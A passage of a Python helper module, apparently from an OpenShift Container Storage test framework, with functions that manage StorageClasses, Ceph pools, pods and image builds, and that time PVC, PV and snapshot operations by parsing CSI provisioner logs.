        kind (str): resource kind like CephBlockPool, pvc.
        resource_name (str): name of the resource.
        namespace (str): the namespace of the resource.

    Returns:
        ocs_ci.ocs.resources.ocs.OCS (obj): OCS object for the fetched resource.
    """
    resource_dict = OCP(
        kind=kind, resource_name=resource_name, namespace=namespace
    ).get()
    return OCS(**resource_dict)
def remove_ocs_object_from_list(kind, resource_name, object_list):
    """
    Remove from *object_list* every object matching *kind* and *resource_name*.

    Args:
        kind (str): resource kind like CephBlockPool, pvc.
        resource_name (str): name of the resource.
        object_list (array): Array of OCS objects.

    Returns:
        (array): the same list object, with matching entries removed.
    """
    # Fix: the original called list.remove() while iterating the same list,
    # which skips the element following each removal (so back-to-back
    # matches could survive). Iterate over a snapshot instead.
    for obj in list(object_list):
        if obj.name == resource_name and obj.kind == kind:
            object_list.remove(obj)
    return object_list
def get_all_storageclass_names():
    """List all StorageClass names, excluding the ignored gp2/flex classes.

    Returns:
        list: list of storageclass name
    """
    sc_obj = ocp.OCP(
        kind=constants.STORAGECLASS, namespace=defaults.ROOK_CLUSTER_NAMESPACE
    )
    items = sc_obj.get()["items"]
    names = []
    for item in items:
        name = item.get("metadata").get("name")
        # Skip the platform-provided classes we never want to touch.
        if name in constants.IGNORE_SC_GP2 or name in constants.IGNORE_SC_FLEX:
            continue
        names.append(name)
    return names
def delete_storageclasses(sc_objs):
    """
    Delete the given StorageClass objects.

    Args:
        sc_objs (list): List of SC objects for deletion

    Returns:
        bool: True if deletion is successful
    """
    # Fix: the original docstring opened with a malformed `""" "` (stray
    # quote after the triple quote).
    for sc in sc_objs:
        logger.info("Deleting StorageClass with name %s", sc.name)
        sc.delete()
    return True
def get_cephblockpool_names():
    """List the names of all CephBlockPool resources in the cluster namespace.

    Returns:
        list: list of cephblockpool name
    """
    pool_obj = ocp.OCP(
        kind=constants.CEPHBLOCKPOOL, namespace=defaults.ROOK_CLUSTER_NAMESPACE
    )
    items = pool_obj.get()["items"]
    return [entry.get("metadata").get("name") for entry in items]
def delete_cephblockpools(cbp_objs):
    """Delete each CephBlockPool object in *cbp_objs*.

    Args:
        cbp_objs (list): List of CBP objects for deletion

    Returns:
        bool: True if deletion of CephBlockPool is successful
    """
    for pool in cbp_objs:
        logger.info("Deleting CephBlockPool with name %s", pool.name)
        pool.delete()
    return True
def get_cephfs_name():
    """Retrieve the name of the (first) CephFS filesystem.

    Returns:
        str: Name of CFS
    """
    tools_pod = pod.get_ceph_tools_pod()
    return tools_pod.exec_ceph_cmd("ceph fs ls")[0]["name"]
def pull_images(image_name):
    """
    Pull the given container image on all worker nodes.

    Args:
        image_name (str): Name of the container image to be pulled

    Returns: None

    Raises:
        AssertionError: if the pull command fails on any node
    """
    node_objs = node.get_node_objs(node.get_worker_nodes())
    for node_obj in node_objs:
        # Fix: use the module-level `logger` (was the root `logging` module),
        # consistent with the rest of this file.
        logger.info(f'pulling image "{image_name} " on node {node_obj.name}')
        assert node_obj.ocp.exec_oc_debug_cmd(
            node_obj.name, cmd_list=[f"podman pull {image_name}"]
        )
def run_io_with_rados_bench(**kw):
    """
    A task for radosbench. Runs radosbench command on specified pod. If
    parameters are not provided task assumes few default parameters. This task
    runs command in synchronous fashion.

    Args:
        kw (dict): a dictionary of various radosbench parameters.
            ex::

                pool_name:pool
                pg_num:number of pgs for pool
                op: type of operation {read, write}
                cleanup: True OR False

    Returns:
        ret: return value of radosbench command, or False on failure
    """
    logger.info("Running radosbench task")
    ceph_pods = kw.get("ceph_pods")  # list of pod objects of ceph cluster
    # Fix: renamed locals that shadowed the module-level `config` import and
    # the stdlib `time` module.
    bench_config = kw.get("config")

    role = bench_config.get("role", "client")
    clients = [cpod for cpod in ceph_pods if role in cpod.roles]

    idx = bench_config.get("idx", 0)
    client = clients[idx]
    op = bench_config.get("op", "write")
    cleanup = ["--no-cleanup", "--cleanup"][bench_config.get("cleanup", True)]
    pool = bench_config.get("pool")

    block = str(bench_config.get("size", 4 << 20))
    duration = str(bench_config.get("time", 120))

    rados_bench = (
        f"rados --no-log-to-stderr "
        f"-b {block} "
        f"-p {pool} "
        f"bench "
        f"{duration} "
        f"{op} "
        f"{cleanup} "
    )
    try:
        ret = client.exec_ceph_cmd(ceph_cmd=rados_bench)
    except CommandFailed as ex:
        logger.error(f"Rados bench failed\n Error is: {ex}")
        return False

    logger.info(ret)
    logger.info("Finished radosbench")
    return ret
def get_all_pvs():
    """
    List every PV in the openshift-storage namespace.

    Returns:
        dict: Dict of all pv in openshift-storage namespace

    """
    return ocp.OCP(
        kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE
    ).get()
# TODO: revert counts of tries and delay,BZ 1726266
@retry(AssertionError, tries=20, delay=10, backoff=1)
def validate_pv_delete(pv_name):
    """
    Validate that a PV has been removed after its PVC was deleted.
    Retried via the decorator until the PV disappears or tries run out.

    Args:
        pv_name (str): pv from pvc to validates

    Returns:
        bool: True if deletion is successful

    Raises:
        AssertionError: If pv is not deleted

    """
    pv_ocp = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
    try:
        pv_data = pv_ocp.get(resource_name=pv_name)
    except CommandFailed:
        # the lookup failing means the PV is gone, which is what we want
        return True
    if pv_data:
        msg = f"{constants.PV} {pv_name} is not deleted after PVC deletion"
        raise AssertionError(msg)
def create_pods(
    pvc_objs, pod_factory, interface, pods_for_rwx=1, status="", nodes=None
):
    """
    Create one pod per PVC (plus extra pods for RWX PVCs) via the supplied
    pod factory.

    Args:
        pvc_objs (list): List of ocs_ci.ocs.resources.pvc.PVC instances
        pod_factory (function): pod_factory function
        interface (int): Interface type
        pods_for_rwx (int): Number of pods to be created if access mode of
            PVC is RWX
        status (str): If provided, wait for desired state of each pod before
            creating next one
        nodes (list): Node name for each pod will be selected from this list.

    Returns:
        list: list of Pod objects

    """
    pod_objs = []
    # round-robin over the given node names so pods spread across them
    nodes_iter = cycle(nodes) if nodes else None
    for pvc_obj in pvc_objs:
        volume_mode = getattr(
            pvc_obj, "volume_mode", pvc_obj.get()["spec"]["volumeMode"]
        )
        # NOTE(review): the getattr default is evaluated eagerly, so
        # pvc_obj.get_pvc_access_mode is accessed even when 'access_mode'
        # exists — presumably it is a property; confirm on the PVC class
        access_mode = getattr(pvc_obj, "access_mode", pvc_obj.get_pvc_access_mode)
        if volume_mode == "Block":
            # raw block PVCs need the dedicated raw-block pod template
            pod_dict = constants.CSI_RBD_RAW_BLOCK_POD_YAML
            raw_block_pv = True
        else:
            raw_block_pv = False
            pod_dict = ""
        if access_mode == constants.ACCESS_MODE_RWX:
            # create pods_for_rwx - 1 pods here; the unconditional pod
            # created below brings the per-PVC total to pods_for_rwx
            pod_obj_rwx = [
                pod_factory(
                    interface=interface,
                    pvc=pvc_obj,
                    status=status,
                    node_name=next(nodes_iter) if nodes_iter else None,
                    pod_dict_path=pod_dict,
                    raw_block_pv=raw_block_pv,
                )
                for _ in range(1, pods_for_rwx)
            ]
            pod_objs.extend(pod_obj_rwx)
        pod_obj = pod_factory(
            interface=interface,
            pvc=pvc_obj,
            status=status,
            node_name=next(nodes_iter) if nodes_iter else None,
            pod_dict_path=pod_dict,
            raw_block_pv=raw_block_pv,
        )
        pod_objs.append(pod_obj)
    return pod_objs
def create_build_from_docker_image(
    image_name,
    install_package,
    namespace,
    source_image="quay.io/ocsci/fedora",
    source_image_label="latest",
):
    """
    Allows to create a build config using a Dockerfile specified as an
    argument, eg.::

        $ oc new-build -D $'FROM centos:7\\nRUN yum install -y httpd'

    creates a build with ``httpd`` installed.

    Args:
        image_name (str): Name of the image to be created
        source_image (str): Source image to build docker image from,
            defaults to Centos as base image
        namespace (str): project where build config should be created
        source_image_label (str): Tag to use along with the image name,
            defaults to 'latest'
        install_package (str): package to install over the base image

    Returns:
        ocs_ci.ocs.ocp.OCP (obj): The OCP object for the image
        Fails on UnavailableBuildException exception if build creation
        fails

    """
    base_image = source_image + ":" + source_image_label
    # in disconnected environments the base image must come from the mirror
    if config.DEPLOYMENT.get("disconnected"):
        base_image = mirror_image(image=base_image)
    cmd = f"yum install -y {install_package}"
    # propagate cluster proxy settings into the yum invocation
    http_proxy, https_proxy, no_proxy = get_cluster_proxies()
    if http_proxy:
        cmd = (
            f"http_proxy={http_proxy} https_proxy={https_proxy} "
            f"no_proxy='{no_proxy}' {cmd}"
        )
    # CMD tail keeps the resulting container alive for later exec calls
    docker_file = f"FROM {base_image}\n " f" RUN {cmd}\n" f"CMD tail -f /dev/null"
    command = f"new-build -D $'{docker_file}' --name={image_name}"
    kubeconfig = os.getenv("KUBECONFIG")
    oc_cmd = f"oc -n {namespace} "
    if kubeconfig:
        oc_cmd += f"--kubeconfig {kubeconfig} "
    oc_cmd += command
    logger.info(f"Running command {oc_cmd}")
    # NOTE(review): timeout=15 only covers submitting the build request;
    # any stderr output (even warnings) is treated as a failure
    result = run(oc_cmd, stdout=PIPE, stderr=PIPE, timeout=15, shell=True)
    if result.stderr.decode():
        raise UnavailableBuildException(
            f"Build creation failed with error: {result.stderr.decode()}"
        )
    out = result.stdout.decode()
    logger.info(out)
    if "Success" in out:
        # Build becomes ready once build pod goes into Completed state
        pod_obj = OCP(kind="Pod", resource_name=image_name)
        if pod_obj.wait_for_resource(
            condition="Completed",
            resource_name=f"{image_name}" + "-1-build",
            timeout=300,
            sleep=30,
        ):
            logger.info(f"build {image_name} ready")
            set_image_lookup(image_name)
            logger.info(f"image {image_name} can now be consumed")
            image_stream_obj = OCP(kind="ImageStream", resource_name=image_name)
            return image_stream_obj
    else:
        raise UnavailableBuildException("Build creation failed")
def set_image_lookup(image_name):
    """
    Enable image lookup for an image stream so objects can reference the
    image stream tag directly in their image field. Example::

        $ oc set image-lookup mysql
        $ oc run mysql --image=mysql

    Args:
        image_name (str): Name of the image stream to pull
            the image locally

    Returns:
        str: output of set image-lookup command

    """
    logger.info(f'image lookup for image"{image_name}" is set')
    imagestream_ocp = ocp.OCP(kind="ImageStream")
    return imagestream_ocp.exec_oc_cmd(f"set image-lookup {image_name}")
def get_snapshot_time(interface, snap_name, status):
    """
    Get the starting/ending creation time of a snapshot based on CSI logs.

    The time and date extraction code below has been modified to read
    the month and day data in the logs. This fixes an error where negative
    time values are calculated when test runs cross midnight. Also, previous
    calculations would not set the year, and so the calculations were done
    as if the year were 1900. This is not a problem except that 1900 was
    not a leap year and so the next February 29th would throw ValueErrors
    for the whole day. To avoid this problem, changes were made to also
    include the current year.

    Incorrect times will still be given for tests that cross over from
    December 31 to January 1.

    Args:
        interface (str): The interface backed the PVC
        snap_name (str / list): Name of the snapshot(s); a list is expected
            to hold snapshot objects with a ``.name`` attribute
        status (str): the status that we want to get - Start / End

    Returns:
        datetime object: Time of snapshot(s) creation, or None when the
            status is invalid or no matching log line was found

    """

    def get_pattern_time(log, snapname, pattern):
        """
        Get the time of pattern in the log

        Args:
            log (list): list of all lines in the log file
            snapname (str): the name of the snapshot
            pattern (str): the pattern that need to be found in the log (start / bound)

        Returns:
            str: string of the pattern timestamp in the log, if not found None

        """
        this_year = str(datetime.datetime.now().year)
        for line in log:
            if re.search(snapname, line) and re.search(pattern, line):
                # log lines start with '<month> <day>'; prepend the year so
                # strptime does not default to 1900
                mon_day = " ".join(line.split(" ")[0:2])
                return f"{this_year} {mon_day}"
        return None

    logs = ""
    # the starting and ending time are taken from different logs,
    # the start creation time is taken from the snapshot controller, while
    # the end creation time is taken from the csi snapshot driver
    if status.lower() == "start":
        pattern = "Creating content for snapshot"
        # Get the snapshoter-controller pod
        pod_name = pod.get_csi_snapshoter_pod()
        logs = pod.get_pod_logs(
            pod_name, namespace="openshift-cluster-storage-operator"
        )
    elif status.lower() == "end":
        pattern = "readyToUse true"
        pod_name = pod.get_csi_provisioner_pod(interface)
        # get the logs from the csi-provisioner containers
        for log_pod in pod_name:
            logs += pod.get_pod_logs(log_pod, "csi-snapshotter")
    else:
        logger.error(f"the status {status} is invalid.")
        return None

    logs = logs.split("\n")
    stat = None

    # Extract the time for the one PVC snapshot provisioning
    if isinstance(snap_name, str):
        stat = get_pattern_time(logs, snap_name, pattern)
    # Extract the time for the list of PVCs snapshot provisioning
    if isinstance(snap_name, list):
        all_stats = [
            get_pattern_time(logs, snapname.name, pattern) for snapname in snap_name
        ]
        # BUGFIX: get_pattern_time may return None for snapshots without a
        # matching log line; sorting a list containing None raises TypeError
        # on Python 3, and indexing an empty list raises IndexError. Filter
        # the misses and fall through (stat stays None) when nothing matched.
        found_stats = sorted(s for s in all_stats if s is not None)
        if found_stats:
            if status.lower() == "end":
                stat = found_stats[-1]  # return the highest time
            elif status.lower() == "start":
                stat = found_stats[0]  # return the lowest time

    if stat:
        return datetime.datetime.strptime(stat, DATE_TIME_FORMAT)
    else:
        return None
def measure_snapshot_creation_time(interface, snap_name, snap_con_name, snap_uid=None):
    """
    Measure Snapshot creation time based on logs

    Args:
        interface (str): The interface backing the snapshot's PVC
        snap_name (str): Name of the snapshot for creation time measurement
        snap_con_name (str): Name of the snapshot content, used to locate
            the creation end time in the logs
        snap_uid (str): UID of the snapshot; used only by the 4.8+ log
            format fallback below. NOTE(review): if both timestamps are
            missing and snap_uid is None, re.search(None, ...) raises
            TypeError — callers presumably always pass it; confirm.

    Returns:
        float: Creation time for the snapshot, or None if it could not be
            determined

    """
    start = get_snapshot_time(interface, snap_name, status="start")
    end = get_snapshot_time(interface, snap_con_name, status="end")
    logs = ""
    if start and end:
        total = end - start
        return total.total_seconds()
    else:
        # at 4.8 the log messages was changed, so need different parsing
        pod_name = pod.get_csi_provisioner_pod(interface)
        # get the logs from the csi-provisioner containers
        for log_pod in pod_name:
            logger.info(f"Read logs from {log_pod}")
            logs += pod.get_pod_logs(log_pod, "csi-snapshotter")
        logs = logs.split("\n")
        pattern = "CSI CreateSnapshot: snapshot-"
        for line in logs:
            if (
                re.search(snap_uid, line)
                and re.search(pattern, line)
                and re.search("readyToUse \\[true\\]", line)
            ):
                # The creation time in the log is in nanoseconds, so it
                # needs converting to seconds
                results = int(line.split()[-5].split(":")[1].replace("]", "")) * (
                    10 ** -9
                )
                return float(f"{results:.3f}")
    return None
def get_provision_time(interface, pvc_name, status="start"):
    """
    Get the starting/ending creation time of a PVC based on provisioner logs

    Args:
        interface (str): The interface backed the PVC
        pvc_name (str / list): Name of the PVC(s) for creation time
            the list will be list of pvc objects
        status (str): the status that we want to get - Start / End

    Returns:
        datetime object: Time of PVC(s) creation

    """
    # map the requested status onto the keyword used in the log lines
    operation = "succeeded" if status.lower() == "end" else "started"
    this_year = str(datetime.datetime.now().year)

    # Get the correct provisioner pod based on the interface and collect
    # the logs from both csi-provisioner containers
    provisioner_pods = pod.get_csi_provisioner_pod(interface)
    raw_logs = pod.get_pod_logs(provisioner_pods[0], "csi-provisioner")
    raw_logs += pod.get_pod_logs(provisioner_pods[1], "csi-provisioner")
    logs = raw_logs.split("\n")

    # Extract the time for the one PVC provisioning
    if isinstance(pvc_name, str):
        matches = [
            line
            for line in logs
            if re.search(f"provision.*{pvc_name}.*{operation}", line)
        ]
        mon_day = " ".join(matches[0].split(" ")[0:2])
        stat = f"{this_year} {mon_day}"
    # Extract the time for the list of PVCs provisioning
    if isinstance(pvc_name, list):
        all_stats = []
        for pvc in pvc_name:
            matches = [
                line
                for line in logs
                if re.search(f"provision.*{pvc.name}.*{operation}", line)
            ]
            mon_day = " ".join(matches[0].split(" ")[0:2])
            all_stats.append(f"{this_year} {mon_day}")
        all_stats = sorted(all_stats)
        if status.lower() == "end":
            stat = all_stats[-1]  # return the highest time
        elif status.lower() == "start":
            stat = all_stats[0]  # return the lowest time
    return datetime.datetime.strptime(stat, DATE_TIME_FORMAT)
def get_start_creation_time(interface, pvc_name):
    """
    Get the starting creation time of a PVC based on provisioner logs

    Args:
        interface (str): The interface backed the PVC
        pvc_name (str): Name of the PVC for creation time measurement

    Returns:
        datetime object: Start time of PVC creation

    """
    year = str(datetime.datetime.now().year)
    # collect logs from both csi-provisioner containers for this interface
    provisioner_pods = pod.get_csi_provisioner_pod(interface)
    log_text = pod.get_pod_logs(provisioner_pods[0], "csi-provisioner")
    log_text += pod.get_pod_logs(provisioner_pods[1], "csi-provisioner")

    # first line that marks the start of provisioning for this PVC
    matches = [
        line
        for line in log_text.split("\n")
        if re.search(f"provision.*{pvc_name}.*started", line)
    ]
    mon_day = " ".join(matches[0].split(" ")[0:2])
    return datetime.datetime.strptime(f"{year} {mon_day}", DATE_TIME_FORMAT)
def get_end_creation_time(interface, pvc_name):
    """
    Get the ending creation time of a PVC based on provisioner logs

    Args:
        interface (str): The interface backed the PVC
        pvc_name (str): Name of the PVC for creation time measurement

    Returns:
        datetime object: End time of PVC creation

    """
    year = str(datetime.datetime.now().year)
    # collect logs from both csi-provisioner containers for this interface
    provisioner_pods = pod.get_csi_provisioner_pod(interface)
    log_text = pod.get_pod_logs(provisioner_pods[0], "csi-provisioner")
    log_text += pod.get_pod_logs(provisioner_pods[1], "csi-provisioner")

    matches = [
        line
        for line in log_text.split("\n")
        if re.search(f"provision.*{pvc_name}.*succeeded", line)
    ]
    # End provisioning string may appear in logs several times, take here the latest one
    mon_day = " ".join(matches[-1].split(" ")[0:2])
    return datetime.datetime.strptime(f"{year} {mon_day}", DATE_TIME_FORMAT)
def measure_pvc_creation_time(interface, pvc_name):
    """
    Measure PVC creation time based on logs

    Args:
        interface (str): The interface backed the PVC
        pvc_name (str): Name of the PVC for creation time measurement

    Returns:
        float: Creation time for the PVC

    """
    elapsed = get_end_creation_time(
        interface=interface, pvc_name=pvc_name
    ) - get_start_creation_time(interface=interface, pvc_name=pvc_name)
    return elapsed.total_seconds()
def measure_pvc_creation_time_bulk(interface, pvc_name_list, wait_time=60):
    """
    Measure PVC creation time of bulk PVC based on logs.

    Polls the CSI provisioner logs (re-fetching every ``wait_time`` seconds,
    up to 6 attempts) until both 'started' and 'succeeded' lines exist for
    every PVC, then computes each PVC's creation duration.

    Args:
        interface (str): The interface backed the PVC
        pvc_name_list (list): List of PVC Names for measuring creation time
        wait_time (int): Seconds to wait before collecting CSI log

    Returns:
        pvc_dict (dict): Dictionary of pvc_name with creation time.

    Raises:
        UnexpectedBehaviour: if some PVCs still have no creation data in the
            CSI logs after all retries

    """
    # Get the correct provisioner pod based on the interface
    pod_name = pod.get_csi_provisioner_pod(interface)
    # due to some delay in CSI log generation added wait
    time.sleep(wait_time)
    # get the logs from the csi-provisioner containers
    logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
    logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
    logs = logs.split("\n")
    loop_counter = 0
    while True:
        no_data_list = list()
        for name in pvc_name_list:
            # check if PV data present in CSI logs
            start = [i for i in logs if re.search(f"provision.*{name}.*started", i)]
            end = [i for i in logs if re.search(f"provision.*{name}.*succeeded", i)]
            if not start or not end:
                no_data_list.append(name)
        if no_data_list:
            # Clear and get CSI logs after 60secs
            logging.info(f"PVC count without CSI create log data {len(no_data_list)}")
            logs.clear()
            time.sleep(wait_time)
            logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
            logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
            logs = logs.split("\n")
            loop_counter += 1
            if loop_counter >= 6:
                logging.info("Waited for more than 6mins still no data")
                raise UnexpectedBehaviour(
                    f"There is no pvc creation data in CSI logs for {no_data_list}"
                )
            continue
        else:
            break
    pvc_dict = dict()
    # log lines carry only month/day; prepend the current year so strptime
    # does not default to 1900 (which breaks on Feb 29)
    this_year = str(datetime.datetime.now().year)
    for pvc_name in pvc_name_list:
        # Extract the starting time for the PVC provisioning
        start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
        mon_day = " ".join(start[0].split(" ")[0:2])
        start = f"{this_year} {mon_day}"
        start_time = datetime.datetime.strptime(start, DATE_TIME_FORMAT)
        # Extract the end time for the PVC provisioning
        end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
        mon_day = " ".join(end[0].split(" ")[0:2])
        end = f"{this_year} {mon_day}"
        end_time = datetime.datetime.strptime(end, DATE_TIME_FORMAT)
        total = end_time - start_time
        pvc_dict[pvc_name] = total.total_seconds()
    return pvc_dict
def measure_pv_deletion_time_bulk(
    interface, pv_name_list, wait_time=60, return_log_times=False
):
    """
    Measure PV deletion time of bulk PV, based on logs.

    Polls the CSI provisioner logs (re-fetching every ``wait_time`` seconds,
    up to 6 attempts) until both 'started' and 'succeeded' deletion lines
    exist for every PV.

    Args:
        interface (str): The interface backed the PV
        pv_name_list (list): List of PV Names for measuring deletion time
        wait_time (int): Seconds to wait before collecting CSI log
        return_log_times (bool): Determines the return value -- if False, dictionary of pv_names with the deletion time
            is returned; if True -- the dictionary of pv_names with the tuple of (start_deletion_time,
            end_deletion_time) is returned

    Returns:
        pv_dict (dict): Dictionary where the pv_names are the keys. The value of the dictionary depend on the
            return_log_times argument value and are either the corresponding deletion times (when return_log_times
            is False) or a tuple of (start_deletion_time, end_deletion_time) as they appear in the logs

    Raises:
        UnexpectedBehaviour: if some PVs still have no deletion data in the
            CSI logs after all retries

    """
    # Get the correct provisioner pod based on the interface
    pod_name = pod.get_csi_provisioner_pod(interface)
    # due to some delay in CSI log generation added wait
    time.sleep(wait_time)
    # get the logs from the csi-provisioner containers
    logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
    logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
    logs = logs.split("\n")
    loop_counter = 0
    while True:
        no_data_list = list()
        for pv in pv_name_list:
            # check if PV data present in CSI logs
            start = [i for i in logs if re.search(f'delete "{pv}": started', i)]
            end = [i for i in logs if re.search(f'delete "{pv}": succeeded', i)]
            if not start or not end:
                no_data_list.append(pv)
        if no_data_list:
            # Clear and get CSI logs after 60secs
            logging.info(f"PV count without CSI delete log data {len(no_data_list)}")
            logs.clear()
            time.sleep(wait_time)
            logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
            logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
            logs = logs.split("\n")
            loop_counter += 1
            if loop_counter >= 6:
                logging.info("Waited for more than 6mins still no data")
                raise UnexpectedBehaviour(
                    f"There is no pv deletion data in CSI logs for {no_data_list}"
                )
            continue
        else:
            break
    pv_dict = dict()
    # log lines carry only month/day; prepend the current year so strptime
    # does not default to 1900 (which breaks on Feb 29)
    this_year = str(datetime.datetime.now().year)
    for pv_name in pv_name_list:
        # Extract the deletion start time for the PV
        start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
        mon_day = " ".join(start[0].split(" ")[0:2])
        start_tm = f"{this_year} {mon_day}"
        start_time = datetime.datetime.strptime(start_tm, DATE_TIME_FORMAT)
        # Extract the deletion end time for the PV
        end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
        mon_day = " ".join(end[0].split(" ")[0:2])
        end_tm = f"{this_year} {mon_day}"
        end_time = datetime.datetime.strptime(end_tm, DATE_TIME_FORMAT)
        total = end_time - start_time
        if not return_log_times:
            pv_dict[pv_name] = total.total_seconds()
        else:
            pv_dict[pv_name] = (start_tm, end_tm)
    return pv_dict
def get_start_deletion_time(interface, pv_name):
    """
    Get the starting deletion time of a PV based on provisioner logs

    Args:
        interface (str): The interface backed the PV
        pv_name (str): Name of the PV for deletion time measurement

    Returns:
        datetime object: Start time of PV deletion

    """
    year = str(datetime.datetime.now().year)
    # collect logs from both csi-provisioner containers for this interface
    provisioner_pods = pod.get_csi_provisioner_pod(interface)
    log_text = pod.get_pod_logs(provisioner_pods[0], "csi-provisioner")
    log_text += pod.get_pod_logs(provisioner_pods[1], "csi-provisioner")

    # first line that marks the start of deletion for this PV
    matches = [
        line
        for line in log_text.split("\n")
        if re.search(f'delete "{pv_name}": started', line)
    ]
    mon_day = " ".join(matches[0].split(" ")[0:2])
    return datetime.datetime.strptime(f"{year} {mon_day}", DATE_TIME_FORMAT)
def get_end_deletion_time(interface, pv_name):
    """
    Get the ending deletion time of a PV based on provisioner logs

    Args:
        interface (str): The interface backed the PV
        pv_name (str): Name of the PV for deletion time measurement

    Returns:
        datetime object: End time of PV deletion

    """
    year = str(datetime.datetime.now().year)
    # collect logs from both csi-provisioner containers for this interface
    provisioner_pods = pod.get_csi_provisioner_pod(interface)
    log_text = pod.get_pod_logs(provisioner_pods[0], "csi-provisioner")
    log_text += pod.get_pod_logs(provisioner_pods[1], "csi-provisioner")

    # first line that marks successful deletion of this PV
    matches = [
        line
        for line in log_text.split("\n")
        if re.search(f'delete "{pv_name}": succeeded', line)
    ]
    mon_day = " ".join(matches[0].split(" ")[0:2])
    return datetime.datetime.strptime(f"{year} {mon_day}", DATE_TIME_FORMAT)
def measure_pvc_deletion_time(interface, pv_name):
    """
    Measure PVC deletion time based on logs

    Args:
        interface (str): The interface backed the PVC
        pv_name (str): Name of the PV for deletion time measurement

    Returns:
        float: Deletion time for the PVC

    """
    elapsed = get_end_deletion_time(
        interface=interface, pv_name=pv_name
    ) - get_start_deletion_time(interface=interface, pv_name=pv_name)
    return elapsed.total_seconds()
def pod_start_time(pod_obj):
    """
    Measure how long each container in a pod took to reach the running
    state, as the difference between the pod's startTime and each
    container's running startedAt timestamp.

    Args:
        pod_obj(obj): pod object to measure start time

    Returns:
        containers_start_time(dict):
            Returns the name and start time of container(s) in a pod

    """
    time_format = "%Y-%m-%dT%H:%M:%SZ"
    pod_started = datetime.datetime.strptime(
        pod_obj.data["status"]["startTime"], time_format
    )
    containers_start_time = {}
    for container_status in pod_obj.data["status"]["containerStatuses"]:
        container_started = datetime.datetime.strptime(
            container_status["state"]["running"]["startedAt"], time_format
        )
        containers_start_time[container_status["name"]] = (
            container_started - pod_started
        ).seconds
    return containers_start_time
def get_default_storage_class():
    """
    Get the default StorageClass(es)

    Returns:
        list: default StorageClass(es) list

    """
    sc_items = ocp.OCP(kind="StorageClass").get().get("items")
    default_names = []
    for sc in sc_items:
        metadata = sc.get("metadata")
        # StorageClasses without annotations can never be the default
        if "annotations" not in metadata:
            continue
        is_default = metadata.get("annotations").get(
            "storageclass.kubernetes.io/is-default-class"
        )
        if is_default == "true":
            default_names.append(metadata.get("name"))
    return default_names
def change_default_storageclass(scname):
    """
    Change the default StorageClass to the given SC name

    Args:
        scname (str): StorageClass name

    Returns:
        bool: True on success

    """
    current_defaults = get_default_storage_class()
    ocp_obj = ocp.OCP(kind="StorageClass")
    # Demote every existing default StorageClass first
    unset_patch = (
        ' \'{"metadata": {"annotations":'
        '{"storageclass.kubernetes.io/is-default-class"'
        ':"false"}}}\' '
    )
    for sc in current_defaults:
        ocp_obj.exec_oc_cmd(command=f"patch storageclass {sc} -p" + unset_patch)
    # Promote the requested StorageClass to default
    set_patch = (
        ' \'{"metadata": {"annotations":'
        '{"storageclass.kubernetes.io/is-default-class"'
        ':"true"}}}\' '
    )
    ocp_obj.exec_oc_cmd(command=f"patch storageclass {scname} -p" + set_patch)
    return True
def is_volume_present_in_backend(interface, image_uuid, pool_name=None):
    """
    Check whether Image/Subvolume is present in the backend.

    Args:
        interface (str): The interface backed the PVC
        image_uuid (str): Part of VolID which represents corresponding
            image/subvolume in backend, eg:
            ``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
            Output is the CSI generated VolID and looks like:
            ``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
            where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
        pool_name (str): Name of the rbd-pool if interface is CephBlockPool

    Returns:
        bool: True if volume is present and False if volume is not present

    """
    cmd = ""
    valid_error = []
    ct_pod = pod.get_ceph_tools_pod()
    # pick the lookup command and the "not found" error strings per interface
    if interface == constants.CEPHBLOCKPOOL:
        valid_error = [f"error opening image csi-vol-{image_uuid}"]
        cmd = f"rbd info -p {pool_name} csi-vol-{image_uuid}"
    if interface == constants.CEPHFILESYSTEM:
        valid_error = [
            f"Subvolume 'csi-vol-{image_uuid}' not found",
            f"subvolume 'csi-vol-{image_uuid}' does not exist",
        ]
        cmd = (
            f"ceph fs subvolume getpath {get_cephfs_name()}"
            f" csi-vol-{image_uuid} csi"
        )
    try:
        ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format="json")
    except CommandFailed as ecf:
        # any error other than "not found" is unexpected — fail loudly
        assert any([error in str(ecf) for error in valid_error]), (
            f"Error occurred while verifying volume is present in backend: "
            f"{str(ecf)} ImageUUID: {image_uuid}. Interface type: {interface}"
        )
        logger.info(
            f"Volume corresponding to uuid {image_uuid} does not exist " f"in backend"
        )
        return False
    logger.info(
        f"Verified: Volume corresponding to uuid {image_uuid} exists " f"in backend"
    )
    return True
def verify_volume_deleted_in_backend(
    interface, image_uuid, pool_name=None, timeout=180
):
    """
    Ensure that Image/Subvolume is deleted in the backend.

    Args:
        interface (str): The interface backed the PVC
        image_uuid (str): Part of VolID which represents corresponding
            image/subvolume in backend, eg:
            ``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
            Output is the CSI generated VolID and looks like:
            ``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
            where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
        pool_name (str): Name of the rbd-pool if interface is CephBlockPool
        timeout (int): Wait time for the volume to be deleted.

    Returns:
        bool: True if volume is deleted before timeout.
            False if volume is not deleted.

    """
    sampler = TimeoutSampler(
        timeout,
        2,
        is_volume_present_in_backend,
        interface=interface,
        image_uuid=image_uuid,
        pool_name=pool_name,
    )
    try:
        # keep sampling until the volume disappears or the sampler times out
        for still_present in sampler:
            if not still_present:
                break
        logger.info(
            f"Verified: Volume corresponding to uuid {image_uuid} is deleted "
            f"in backend"
        )
        return True
    except TimeoutExpiredError:
        logger.error(
